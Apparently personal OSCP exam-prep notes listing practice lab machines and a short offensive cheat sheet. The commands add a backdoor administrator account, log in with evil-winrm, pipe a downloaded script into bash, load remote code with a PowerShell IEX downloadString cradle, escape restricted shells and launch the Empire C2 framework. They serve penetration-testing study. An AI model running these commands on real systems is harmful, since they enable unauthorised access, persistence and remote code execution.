God notes

PG boxes on OSCP:

Heist, Hutch, Vault in PG Practice,Resourced


APT, Fuse, Cascade, Monterverde,Resolute,Forest, Arkham, Active, Mantis

Cyber Seclabs:

zero, Secret,Brute, Dictionary, Roast, Spray, Sync, Toast

Always look for config files if you have access to application files!

adds an admini account to the hosts

Try legion script for nmap scanning!

always do nmap -sC (default scripts)

If you are a service account you can create an admin account.

net user gori | passwd123! /add; net localgroup administrators gori /add

evil-winrm -i IP -u gori -p 'passwd123!' to login as the account you just created

net user gori to check priv


/etc/apache2 ;look for config files

linux enum

ldd --version

Transfer module

curl IP/file_name | bash (to execute it)

cat /etc/lsb-release

Transfer method

python -m SimpleHTTPserver 80

-> curl -o outputfile IP/filename

Restricted shell? Try this:

ssh mindy@ -t "bash --noprofile"

hacker@ahoafhoaf:~$ BASH_CMDS[a]=/bin/sh;a 

$ /bin/bash
bash: groups: command not found
hacker@ahoafhoaf:~$ export PATH=$PATH:/bin/
hacker@ahoafhoaf:~$ export PATH=$PATH:/usr/bin


Run sudo

IEX(New-Object Net.WebClient).downloadString('')

docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire

Last updated